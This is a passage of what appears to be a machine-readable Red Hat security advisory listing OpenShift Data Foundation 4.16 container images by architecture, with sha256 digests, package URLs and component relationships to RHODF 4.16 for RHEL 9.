"pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_id: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_id: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_id: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_id: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", 